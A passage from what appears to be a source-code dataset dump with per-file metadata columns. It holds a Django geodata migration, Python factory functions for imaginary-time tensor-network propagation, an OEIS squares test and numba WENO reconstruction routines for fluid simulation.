name='Country',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('code', models.CharField(max_length=2, unique=True, verbose_name='Code')),
('continent', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='countries', to='codenerix_geodata.Continent', verbose_name='Continent')),
],
options={
'abstract': False,
'default_permissions': ('add', 'change', 'delete', 'view', 'list'),
},
),
migrations.CreateModel(
name='CountryGeoNameEN',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('name', models.CharField(max_length=100, verbose_name='Name')),
('country', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='en', to='codenerix_geodata.Country')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CountryGeoNameES',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('name', models.CharField(max_length=100, verbose_name='Name')),
('country', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='es', to='codenerix_geodata.Country')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Province',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('code', models.CharField(max_length=3, verbose_name='Code')),
],
options={
'abstract': False,
'default_permissions': ('add', 'change', 'delete', 'view', 'list'),
},
),
migrations.CreateModel(
name='ProvinceGeoNameEN',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('name', models.CharField(max_length=100, verbose_name='Name')),
('province', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='en', to='codenerix_geodata.Province')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='ProvinceGeoNameES',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('name', models.CharField(max_length=100, verbose_name='Name')),
('province', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='es', to='codenerix_geodata.Province')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Region',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('code', models.CharField(max_length=3, verbose_name='Code')),
('country', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='regions', to='codenerix_geodata.Country', verbose_name='Country')),
],
options={
'abstract': False,
'default_permissions': ('add', 'change', 'delete', 'view', 'list'),
},
),
migrations.CreateModel(
name='RegionGeoNameEN',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('name', models.CharField(max_length=100, verbose_name='Name')),
('region', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='en', to='codenerix_geodata.Region')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='RegionGeoNameES',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('name', models.CharField(max_length=100, verbose_name='Name')),
('region', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='es', to='codenerix_geodata.Region')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='TimeZone',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
('name', models.CharField(max_length=50, unique=True, verbose_name='Name')),
],
options={
'abstract': False,
'default_permissions': ('add', 'change', 'delete', 'view', 'list'),
},
),
migrations.AddField(
model_name='province',
name='region',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='provinces', to='codenerix_geodata.Region', verbose_name='Region'),
),
migrations.AddField(
model_name='city',
name='country',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cities', to='codenerix_geodata.Country', verbose_name='Country'),
),
migrations.AddField(
model_name='city',
name='province',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='cities', to='codenerix_geodata.Province', verbose_name='Province'),
),
migrations.AddField(
model_name='city',
name='region',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='cities', to='codenerix_geodata.Region', verbose_name='Region'),
),
migrations.AddField(
model_name='city',
name='time_zone',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cities', to='codenerix_geodata.TimeZone', verbose_name='City'),
),
]
| 51.325397
| 180
| 0.576852
| 1,228
| 12,934
| 5.885993
| 0.07899
| 0.10653
| 0.072634
| 0.115108
| 0.911179
| 0.908965
| 0.899281
| 0.889873
| 0.889873
| 0.889873
| 0
| 0.00567
| 0.277331
| 12,934
| 251
| 181
| 51.52988
| 0.767626
| 0.005257
| 0
| 0.740741
| 1
| 0
| 0.147477
| 0.033041
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012346
| 0
| 0.028807
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7eeecc6f441ac8c99db932f925c174ddca5ff26e
| 7,451
|
py
|
Python
|
tmps/chain/itime/factory.py
|
fhoeb/py-tmps
|
b7eced582acb4042815a775090a59f569975e3be
|
[
"BSD-3-Clause"
] | 1
|
2020-02-21T20:03:44.000Z
|
2020-02-21T20:03:44.000Z
|
tmps/chain/itime/factory.py
|
fhoeb/py-tmps
|
b7eced582acb4042815a775090a59f569975e3be
|
[
"BSD-3-Clause"
] | null | null | null |
tmps/chain/itime/factory.py
|
fhoeb/py-tmps
|
b7eced582acb4042815a775090a59f569975e3be
|
[
"BSD-3-Clause"
] | 1
|
2020-02-21T19:56:53.000Z
|
2020-02-21T19:56:53.000Z
|
"""
Main interface factory functions for imaginary time evolution propagators (ITMPS, ITMPO, ITPMPS)
"""
from tmps.chain.itime.itmps import ITMPS
from tmps.chain.itime.itpmps import ITPMPS
from tmps.chain.itime.itmpo import ITMPO
import numpy as np
from tmps.utils.shape import check_shape
def from_hamiltonian(psi_0, mpa_type, h_site, h_bond, tau=0.01, state_compression_kwargs=None,
op_compression_kwargs=None, second_order_trotter=False, t0=0, psi_0_compression_kwargs=None,
track_trace=False):
"""
Factory function for imaginary time TMP-objects (ITMPS, ITMPO, ITPMPS)
:param psi_0: Initial state as MPArray. Need not be normalized, as it is normalized before propagation
:param mpa_type: Type of MPArray to propagate, supported are mps, mpo, and pmps
:param h_site: Iterator over local site Hamiltonians. If a single numpy ndarray is passed
this element is broadcast over all sites
:param h_bond: Iterator over bond Hamiltonians. If a single numpy ndarray is passed
this element is broadcast over all bonds
:param tau: Timestep for each invocation of evolve. Real timestep should be passed here. Default is .01
:param state_compression_kwargs: Arguments for mpa compression after each dot product (see real time
evolution factory function for details)
:param op_compression_kwargs: Arguments for trotter step operator pre-compression (see real time evolution
factory function for details)
:param second_order_trotter: Switch to use second order instead of fourth order trotter if desired
By default fourth order Trotter is used
:param t0: Initial time of the propagation
:param psi_0_compression_kwargs: Optional compresion kwargs for the initial state (see real time evolution
factory function for details)
:param track_trace: If the trace of the (effective) density matrix should be tracked during the
imaginary time evolution
:return: TMP object. If mpa_type is mps: ITMPS obj., if mpa_type is mpo: ITMPO obj.,
if mpa_type is pmps: ITPMPS obj.
"""
if not check_shape(psi_0, mpa_type):
raise AssertionError('MPA shape of the initial state is not compatible with the chosen mpa_type')
assert np.imag(tau) == 0 and np.real(tau) != 0
tau = 1j * tau
if mpa_type == 'mps':
return ITMPS.from_hamiltonian(psi_0, False, False, h_site, h_bond, tau=tau,
state_compression_kwargs=state_compression_kwargs,
op_compression_kwargs=op_compression_kwargs,
second_order_trotter=second_order_trotter, t0=t0,
psi_0_compression_kwargs=psi_0_compression_kwargs,
track_trace=track_trace)
elif mpa_type == 'pmps':
return ITPMPS.from_hamiltonian(psi_0, True, False, h_site, h_bond, tau=tau,
state_compression_kwargs=state_compression_kwargs,
op_compression_kwargs=op_compression_kwargs,
second_order_trotter=second_order_trotter, t0=t0,
psi_0_compression_kwargs=psi_0_compression_kwargs,
track_trace=track_trace)
elif mpa_type == 'mpo':
return ITMPO.from_hamiltonian(psi_0, False, True, h_site, h_bond, tau=tau,
state_compression_kwargs=state_compression_kwargs,
op_compression_kwargs=op_compression_kwargs,
second_order_trotter=second_order_trotter, t0=t0,
psi_0_compression_kwargs=psi_0_compression_kwargs,
track_trace=track_trace)
else:
raise AssertionError('Unrecognized mpa_type')
def from_hi(psi_0, mpa_type, hi, tau=0.01, state_compression_kwargs=None,
op_compression_kwargs=None, second_order_trotter=False, t0=0, psi_0_compression_kwargs=None,
track_trace=False):
"""
Factory function for imaginary time TMP-objects (ITMPS, ITMPO, ITPMPS)
:param psi_0: Initial state as MPArray. Need not be normalized, as it is normalized before propagation
:param mpa_type: Type of MPArray to propagate, supported are mps, mpo, and pmps
:param hi: List/Tuple of all terms in the Hamiltonian H = sum_i hi, where hi is local to one bond
:param tau: Timestep for each invocation of evolve. Real timestep should be passed here. Default is .01
:param state_compression_kwargs: Arguments for mpa compression after each dot product (see real time
evolution factory function for details)
:param op_compression_kwargs: Arguments for trotter step operator pre-compression (see real time evolution
factory function for details)
:param second_order_trotter: Switch to use second order instead of fourth order trotter if desired
By default fourth order Trotter is used
:param t0: Initial time of the propagation
:param psi_0_compression_kwargs: Optional compresion kwargs for the initial state (see real time evolution
factory function for details)
:param track_trace: If the trace of the (effective) density matrix should be tracked during the
imaginary time evolution
:return: TMP object. If mpa_type is mps: ITMPS obj., if mpa_type is mpo: ITMPO obj.,
if mpa_type is pmps: ITPMPS obj.
"""
if not check_shape(psi_0, mpa_type):
raise AssertionError('MPA shape of the initial state is not compatible with the chosen mpa_type')
assert np.imag(tau) == 0 and np.real(tau) != 0
tau = 1j * tau
if mpa_type == 'mps':
return ITMPS.from_hi(psi_0, False, False, hi, tau=tau, state_compression_kwargs=state_compression_kwargs,
op_compression_kwargs=op_compression_kwargs,
second_order_trotter=second_order_trotter, t0=t0,
psi_0_compression_kwargs=psi_0_compression_kwargs,
track_trace=track_trace)
elif mpa_type == 'pmps':
return ITPMPS.from_hi(psi_0, True, False, hi, tau=tau, state_compression_kwargs=state_compression_kwargs,
op_compression_kwargs=op_compression_kwargs,
second_order_trotter=second_order_trotter, t0=t0,
psi_0_compression_kwargs=psi_0_compression_kwargs,
track_trace=track_trace)
elif mpa_type == 'mpo':
return ITMPO.from_hi(psi_0, False, True, hi, tau=tau, state_compression_kwargs=state_compression_kwargs,
op_compression_kwargs=op_compression_kwargs,
second_order_trotter=second_order_trotter, t0=t0,
psi_0_compression_kwargs=psi_0_compression_kwargs,
track_trace=track_trace)
else:
raise AssertionError('Unrecognized mpa_type')
| 66.526786
| 113
| 0.64139
| 934
| 7,451
| 4.885439
| 0.149893
| 0.17883
| 0.077142
| 0.073636
| 0.911681
| 0.885382
| 0.885382
| 0.885382
| 0.885382
| 0.885382
| 0
| 0.011995
| 0.306268
| 7,451
| 111
| 114
| 67.126126
| 0.870768
| 0.42558
| 0
| 0.790323
| 0
| 0
| 0.050906
| 0
| 0
| 0
| 0
| 0
| 0.096774
| 1
| 0.032258
| false
| 0
| 0.080645
| 0
| 0.209677
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
add61b93da4fc9f378051c2a96440624942583ea
| 94
|
py
|
Python
|
tests/test_A000290.py
|
TimothyDJones/oeis
|
d9d608bc32ee31c73c139e1b68e4eb6315205e8d
|
[
"MIT"
] | 21
|
2020-03-21T17:50:13.000Z
|
2022-01-18T01:52:47.000Z
|
tests/test_A000290.py
|
TimothyDJones/oeis
|
d9d608bc32ee31c73c139e1b68e4eb6315205e8d
|
[
"MIT"
] | 296
|
2019-11-18T14:04:36.000Z
|
2022-03-27T21:59:24.000Z
|
tests/test_A000290.py
|
TimothyDJones/oeis
|
d9d608bc32ee31c73c139e1b68e4eb6315205e8d
|
[
"MIT"
] | 29
|
2019-11-18T11:56:22.000Z
|
2022-03-26T22:31:57.000Z
|
from oeis import A000290
def test_squares():
assert A000290[:6] == [0, 1, 4, 9, 16, 25]
| 15.666667
| 46
| 0.617021
| 16
| 94
| 3.5625
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.287671
| 0.223404
| 94
| 5
| 47
| 18.8
| 0.493151
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
adf1125aa39956e6f42a70f2a96f782cf039240f
| 14,658
|
py
|
Python
|
HydroWeno/Weno.py
|
Goobley/WenoExperiments
|
de3207d35ea12a8be60241cdb958ed01db7a52eb
|
[
"MIT"
] | null | null | null |
HydroWeno/Weno.py
|
Goobley/WenoExperiments
|
de3207d35ea12a8be60241cdb958ed01db7a52eb
|
[
"MIT"
] | null | null | null |
HydroWeno/Weno.py
|
Goobley/WenoExperiments
|
de3207d35ea12a8be60241cdb958ed01db7a52eb
|
[
"MIT"
] | 1
|
2020-08-10T07:19:45.000Z
|
2020-08-10T07:19:45.000Z
|
import numpy as np
from numba import njit, stencil, prange
@njit(parallel=True, cache=True)
def reconstruct_weno(q, dx=None):
nRows, nGrid = q.shape
result = np.zeros((nRows, 2, nGrid))
# Set up general and left/right coefficients.
# The left/right coeffs are just flipped relative to each other
Pow = 2
WenoEps = 1e-6
EnoCoeffL = np.array((( 11.0/6.0, -7.0/6.0, 2.0/6.0),
( 2.0/6.0, 5.0/6.0, -1.0/6.0),
(-1.0/6.0, 5.0/6.0, 2.0/6.0)))
LinWL = np.array([0.3, 0.6, 0.1])
EnoCoeffR = np.array((( 2.0/6.0, -7.0/6.0, 11.0/6.0),
(-1.0/6.0, 5.0/6.0, 2.0/6.0),
( 2.0/6.0, 5.0/6.0, -1.0/6.0)))
LinWR = np.array([0.1, 0.6, 0.3])
# Loop over each row in the q matrix - we parallelise over rows
for row in prange(nRows):
beta = np.empty(3)
for i in range(2, nGrid-2):
# Compute beta, the smoothness indicator for each intepolating polynomial
beta[0] = 13./12.*(q[row, i-2] - 2.*q[row, i-1] + q[row, i])**2 + 0.25*(q[row, i-2] - 4.*q[row, i-1] + 3.*q[row, i])**2
beta[1] = 13./12.*(q[row, i-1] - 2.*q[row, i] + q[row, i+1])**2 + 0.25*(q[row, i-1] - q[row, i+1])**2
beta[2] = 13./12.*(q[row, i] - 2.*q[row, i+1] + q[row, i+2])**2 + 0.25*(3.*q[row, i] - 4.*q[row, i+1] + q[row, i+2])**2
# Compute and normalise the non-linear weights
nonLinWL = LinWL / (WenoEps + beta)**Pow
nonLinWR = LinWR / (WenoEps + beta)**Pow
nonLinWL /= np.sum(nonLinWL)
nonLinWR /= np.sum(nonLinWR)
# Compute the standard polynomial reconstructions
enoIntpL = np.zeros(3)
enoIntpR = np.zeros(3)
for s in range(3):
gridIdx = s + i - 2
enoIntpL[s] = np.dot(q[row, gridIdx:gridIdx+3], EnoCoeffL[2-s])
enoIntpR[s] = np.dot(q[row, gridIdx:gridIdx+3], EnoCoeffR[s])
# Combine the different polynomial reconstrucitions weighted by their non-linear weights
result[row, 0, i] = np.dot(nonLinWL, enoIntpL)
result[row, 1, i] = np.dot(nonLinWR, enoIntpR)
result[:, 0, :2] = q[:, :2]
result[:, 1, :2] = q[:, :2]
result[:, 0, -2:] = q[:, -2:]
result[:, 1, -2:] = q[:, -2:]
return result
@njit(parallel=True, cache=True)
def reconstruct_weno_log(q, dx=None):
nRows, nGrid = q.shape
result = np.zeros((nRows, 2, nGrid))
# Set up general and left/right coefficients.
# The left/right coeffs are just flipped relative to each other
Pow = 2
WenoEps = 1e-6
EnoCoeffL = np.array((( 11.0/6.0, -7.0/6.0, 2.0/6.0),
( 2.0/6.0, 5.0/6.0, -1.0/6.0),
(-1.0/6.0, 5.0/6.0, 2.0/6.0)))
LinWL = np.array([0.3, 0.6, 0.1])
EnoCoeffR = np.array((( 2.0/6.0, -7.0/6.0, 11.0/6.0),
(-1.0/6.0, 5.0/6.0, 2.0/6.0),
( 2.0/6.0, 5.0/6.0, -1.0/6.0)))
LinWR = np.array([0.1, 0.6, 0.3])
q[0] = np.log(q[0])
q[2] = np.log(q[2])
q[3] = np.log(q[3])
# Loop over each row in the q matrix - we parallelise over rows
for row in prange(nRows):
beta = np.empty(3)
for i in range(2, nGrid-2):
# Compute beta, the smoothness indicator for each intepolating polynomial
beta[0] = 13./12.*(q[row, i-2] - 2.*q[row, i-1] + q[row, i])**2 + 0.25*(q[row, i-2] - 4.*q[row, i-1] + 3.*q[row, i])**2
beta[1] = 13./12.*(q[row, i-1] - 2.*q[row, i] + q[row, i+1])**2 + 0.25*(q[row, i-1] - q[row, i+1])**2
beta[2] = 13./12.*(q[row, i] - 2.*q[row, i+1] + q[row, i+2])**2 + 0.25*(3.*q[row, i] - 4.*q[row, i+1] + q[row, i+2])**2
# Compute and normalise the non-linear weights
nonLinWL = LinWL / (WenoEps + beta)**Pow
nonLinWR = LinWR / (WenoEps + beta)**Pow
nonLinWL /= np.sum(nonLinWL)
nonLinWR /= np.sum(nonLinWR)
# Compute the standard polynomial reconstructions
enoIntpL = np.zeros(3)
enoIntpR = np.zeros(3)
for s in range(3):
gridIdx = s + i - 2
enoIntpL[s] = np.dot(q[row, gridIdx:gridIdx+3], EnoCoeffL[2-s])
enoIntpR[s] = np.dot(q[row, gridIdx:gridIdx+3], EnoCoeffR[s])
# Combine the different polynomial reconstrucitions weighted by their non-linear weights
result[row, 0, i] = np.dot(nonLinWL, enoIntpL)
result[row, 1, i] = np.dot(nonLinWR, enoIntpR)
result[:, 0, :2] = q[:, :2]
result[:, 1, :2] = q[:, :2]
result[:, 0, -2:] = q[:, -2:]
result[:, 1, -2:] = q[:, -2:]
result[0] = np.exp(result[0])
result[2] = np.exp(result[2])
result[3] = np.exp(result[3])
return result
@njit(parallel=True, cache=True)
def reconstruct_weno_z(q, dx=None):
nRows, nGrid = q.shape
result = np.zeros((nRows, 2, nGrid))
# Set up general and left/right coefficients.
# The left/right coeffs are just flipped relative to each other
Pow = 2
WenoEps = 1e-10
EnoCoeffL = np.array((( 11.0/6.0, -7.0/6.0, 2.0/6.0),
( 2.0/6.0, 5.0/6.0, -1.0/6.0),
(-1.0/6.0, 5.0/6.0, 2.0/6.0)))
LinWL = np.array([0.3, 0.6, 0.1])
EnoCoeffR = np.array((( 2.0/6.0, -7.0/6.0, 11.0/6.0),
(-1.0/6.0, 5.0/6.0, 2.0/6.0),
( 2.0/6.0, 5.0/6.0, -1.0/6.0)))
LinWR = np.array([0.1, 0.6, 0.3])
# Loop over each row in the q matrix - we parallelise over rows
for row in prange(nRows):
beta = np.empty(3)
betaZ = np.empty(3)
for i in range(2, nGrid-2):
# Compute beta, the smoothness indicator for each intepolating polynomial
beta[0] = 13./12.*(q[row, i-2] - 2.*q[row, i-1] + q[row, i])**2 + 0.25*(q[row, i-2] - 4.*q[row, i-1] + 3.*q[row, i])**2
beta[1] = 13./12.*(q[row, i-1] - 2.*q[row, i] + q[row, i+1])**2 + 0.25*(q[row, i-1] - q[row, i+1])**2
beta[2] = 13./12.*(q[row, i] - 2.*q[row, i+1] + q[row, i+2])**2 + 0.25*(3.*q[row, i] - 4.*q[row, i+1] + q[row, i+2])**2
tau5 = np.abs(beta[0] - beta[2])
betaZ[:] = ((beta + WenoEps) / (beta + tau5 + WenoEps))
# Compute and normalise the non-linear weights
nonLinWL = LinWL / betaZ
nonLinWR = LinWR / betaZ
nonLinWL /= np.sum(nonLinWL)
nonLinWR /= np.sum(nonLinWR)
# Compute the standard polynomial reconstructions
enoIntpL = np.zeros(3)
enoIntpR = np.zeros(3)
for s in range(3):
gridIdx = s + i - 2
enoIntpL[s] = np.dot(q[row, gridIdx:gridIdx+3], EnoCoeffL[2-s])
enoIntpR[s] = np.dot(q[row, gridIdx:gridIdx+3], EnoCoeffR[s])
# Combine the different polynomial reconstrucitions weighted by their non-linear weights
result[row, 0, i] = np.dot(nonLinWL, enoIntpL)
result[row, 1, i] = np.dot(nonLinWR, enoIntpR)
result[:, 0, :2] = q[:, :2]
result[:, 1, :2] = q[:, :2]
result[:, 0, -2:] = q[:, -2:]
result[:, 1, -2:] = q[:, -2:]
return result
@njit(parallel=True, cache=True)
def reconstruct_weno_nm(q, dx):
nRows, nGrid = q.shape
result = np.zeros((nRows, 2, nGrid))
# Set up general coefficients.
Pow = 2
WenoEps = 1e-34
EnoCoeff = np.array((( 2.0, -1.0/3.0, -2.0/3.0),
(-1.0/3.0, 2.0/3.0, 2.0/3.0),
( 2.0/3.0, 2.0/3.0, -1.0/3.0)))
BetaCoeffPart1 = np.array(((0.0, 2.0, -2.0),
(2.0, -4.0, 2.0),
(2.0, -4.0, 2.0)))
BetaCoeffPart2 = np.array((( 4.0, -2.0, -2.0),
(-2.0, 0.0, 2.0),
(-6.0, 8.0, -2.0)))
LinW = np.array([0.1, 0.6, 0.3])
# length ratio designated rho
rho = np.zeros(nGrid)
rho[:-1] = dx[:-1] / (dx[:-1] + dx[1:])
# Loop over each row in the q matrix - we parallelise over rows
for row in prange(nRows):
betaL = np.empty(3)
betaR = np.empty(3)
stencilL = np.empty((3, 3)) # coords are [stencilIdx, stencilEntry]
stencilR = np.empty((3, 3)) # coords are [stencilIdx, stencilEntry]
enoIntpL = np.empty(3)
enoIntpR = np.empty(3)
for i in range(2, nGrid-2):
# Compute beta, the smoothness indicator for each intepolating polynomial
q00 = q[row, i-1] + rho[i-1] * (q[row, i-1] - q[row, i-2])
q01 = (1.0 - rho[i]) * q[row, i] + rho[i] * q[row, i+1]
q10 = (1.0 - rho[i-1]) * q[row, i-1] + rho[i-1] * q[row, i]
q11 = q[row, i+1] + rho[i+1] * (q[row, i+1] - q[row, i+2])
q12 = (1.0 - rho[i+1]) * q[row, i+1] + rho[i+1] * q[row, i+2]
q21 = (1.0 - rho[i-2]) * q[row, i-2] + rho[i-2] * q[row, i-1]
stencilL[0, 0] = q[row, i]
stencilL[0, 1] = q01
stencilL[0, 2] = q11
stencilL[1, 0] = q01
stencilL[1, 1] = q[row, i]
stencilL[1, 2] = q10
stencilL[2, 0] = q10
stencilL[2, 1] = q[row, i-1]
stencilL[2, 2] = q21
stencilR[0, 0] = q[row, i]
stencilR[0, 1] = q10
stencilR[0, 2] = q00
stencilR[1, 0] = q10
stencilR[1, 1] = q[row, i]
stencilR[1, 2] = q01
stencilR[2, 0] = q01
stencilR[2, 1] = q[row, i+1]
stencilR[2, 2] = q12
for s in range(3):
betaL[s] = 13.0/12.0*np.dot(BetaCoeffPart1[s], stencilL[s])**2 + 0.25*np.dot(BetaCoeffPart2[s], stencilL[s])**2
betaR[s] = 13.0/12.0*np.dot(BetaCoeffPart1[s], stencilR[s])**2 + 0.25*np.dot(BetaCoeffPart2[s], stencilR[s])**2
# Compute and normalise the non-linear weights
nonLinWL = LinW / (WenoEps + betaL)**Pow
nonLinWR = LinW / (WenoEps + betaR)**Pow
nonLinWL /= np.sum(nonLinWL)
nonLinWR /= np.sum(nonLinWR)
# Compute the standard polynomial reconstructions
for s in range(3):
enoIntpL[s] = np.dot(stencilL[s], EnoCoeff[s])
enoIntpR[s] = np.dot(stencilR[s], EnoCoeff[s])
# Combine the different polynomial reconstrucitions weighted by their non-linear weights
result[row, 0, i] = np.dot(nonLinWL, enoIntpL)
result[row, 1, i] = np.dot(nonLinWR, enoIntpR)
result[:, 0, :2] = q[:, :2]
result[:, 1, :2] = q[:, :2]
result[:, 0, -2:] = q[:, -2:]
result[:, 1, -2:] = q[:, -2:]
return result
@njit(parallel=True, cache=True)
def reconstruct_weno_nm_z(q, dx):
nRows, nGrid = q.shape
result = np.zeros((nRows, 2, nGrid))
# Set up general coefficients.
Pow = 2
WenoEps = 1e-34
EnoCoeff = np.array((( 2.0, -1.0/3.0, -2.0/3.0),
(-1.0/3.0, 2.0/3.0, 2.0/3.0),
( 2.0/3.0, 2.0/3.0, -1.0/3.0)))
BetaCoeffPart1 = np.array(((0.0, 2.0, -2.0),
(2.0, -4.0, 2.0),
(2.0, -4.0, 2.0)))
BetaCoeffPart2 = np.array((( 4.0, -2.0, -2.0),
(-2.0, 0.0, 2.0),
(-6.0, 8.0, -2.0)))
LinW = np.array([0.1, 0.6, 0.3])
# length ratio designated rho
rho = np.zeros(nGrid)
rho[:-1] = dx[:-1] / (dx[:-1] + dx[1:])
# Loop over each row in the q matrix - we parallelise over rows
for row in prange(nRows):
betaL = np.empty(3)
betaR = np.empty(3)
betaZL = np.empty(3)
betaZR = np.empty(3)
stencilL = np.empty((3, 3)) # coords are [stencilIdx, stencilEntry]
stencilR = np.empty((3, 3)) # coords are [stencilIdx, stencilEntry]
enoIntpL = np.empty(3)
enoIntpR = np.empty(3)
for i in range(2, nGrid-2):
# Compute beta, the smoothness indicator for each intepolating polynomial
q00 = q[row, i-1] + rho[i-1] * (q[row, i-1] - q[row, i-2])
q01 = (1.0 - rho[i]) * q[row, i] + rho[i] * q[row, i+1]
q10 = (1.0 - rho[i-1]) * q[row, i-1] + rho[i-1] * q[row, i]
q11 = q[row, i+1] + rho[i+1] * (q[row, i+1] - q[row, i+2])
q12 = (1.0 - rho[i+1]) * q[row, i+1] + rho[i+1] * q[row, i+2]
q21 = (1.0 - rho[i-2]) * q[row, i-2] + rho[i-2] * q[row, i-1]
stencilL[0, 0] = q[row, i]
stencilL[0, 1] = q01
stencilL[0, 2] = q11
stencilL[1, 0] = q01
stencilL[1, 1] = q[row, i]
stencilL[1, 2] = q10
stencilL[2, 0] = q10
stencilL[2, 1] = q[row, i-1]
stencilL[2, 2] = q21
stencilR[0, 0] = q[row, i]
stencilR[0, 1] = q10
stencilR[0, 2] = q00
stencilR[1, 0] = q10
stencilR[1, 1] = q[row, i]
stencilR[1, 2] = q01
stencilR[2, 0] = q01
stencilR[2, 1] = q[row, i+1]
stencilR[2, 2] = q12
for s in range(3):
betaL[s] = 13.0/12.0*np.dot(BetaCoeffPart1[s], stencilL[s])**2 + 0.25*np.dot(BetaCoeffPart2[s], stencilL[s])**2
betaR[s] = 13.0/12.0*np.dot(BetaCoeffPart1[s], stencilR[s])**2 + 0.25*np.dot(BetaCoeffPart2[s], stencilR[s])**2
tau5L = np.abs(betaL[0] - betaL[2])
tau5R = np.abs(betaR[0] - betaR[2])
betaZL[:] = ((betaL + WenoEps) / (betaL + tau5L + WenoEps))
betaZR[:] = ((betaR + WenoEps) / (betaR + tau5R + WenoEps))
# Compute and normalise the non-linear weights
nonLinWL = LinW / betaZL
nonLinWR = LinW / betaZR
nonLinWL /= np.sum(nonLinWL)
nonLinWR /= np.sum(nonLinWR)
# Compute the standard polynomial reconstructions
for s in range(3):
enoIntpL[s] = np.dot(stencilL[s], EnoCoeff[s])
enoIntpR[s] = np.dot(stencilR[s], EnoCoeff[s])
# Combine the different polynomial reconstrucitions weighted by their non-linear weights
result[row, 0, i] = np.dot(nonLinWL, enoIntpL)
result[row, 1, i] = np.dot(nonLinWR, enoIntpR)
result[:, 0, :2] = q[:, :2]
result[:, 1, :2] = q[:, :2]
result[:, 0, -2:] = q[:, -2:]
result[:, 1, -2:] = q[:, -2:]
return result
| 43.111765
| 131
| 0.479602
| 2,326
| 14,658
| 3.018057
| 0.05718
| 0.055271
| 0.064815
| 0.037607
| 0.944302
| 0.944302
| 0.944302
| 0.944302
| 0.938177
| 0.914672
| 0
| 0.102346
| 0.334084
| 14,658
| 340
| 132
| 43.111765
| 0.616843
| 0.146882
| 0
| 0.889313
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019084
| false
| 0
| 0.007634
| 0
| 0.045802
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
